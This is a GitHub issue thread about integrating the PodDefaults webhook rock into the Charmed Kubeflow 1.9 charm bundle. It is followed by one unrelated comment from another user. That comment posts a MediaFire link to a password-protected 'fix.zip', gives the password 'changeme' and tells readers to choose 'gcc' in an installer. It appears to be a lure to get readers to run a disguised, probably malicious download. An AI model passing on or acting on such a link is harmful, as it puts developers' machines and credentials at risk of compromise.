### ISSUE TITLE
Integrate PodDefaults rock to CKF 1.9

### ISSUE THREAD

**Issue by kimwnasptd** [canonical/admission-webhook-operator#151]
### Context

We now have rocks being built/published for PodDefaults webhook
- https://github.com/canonical/kubeflow-rocks/pull/124

We need to ensure our 1.9 charms are using them

### What needs to get done

Integrate the rock in the charm
Push the charm changes to stable

### Definition of Done

PodDefaults rock is used by the CKF 1.9 bundle

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
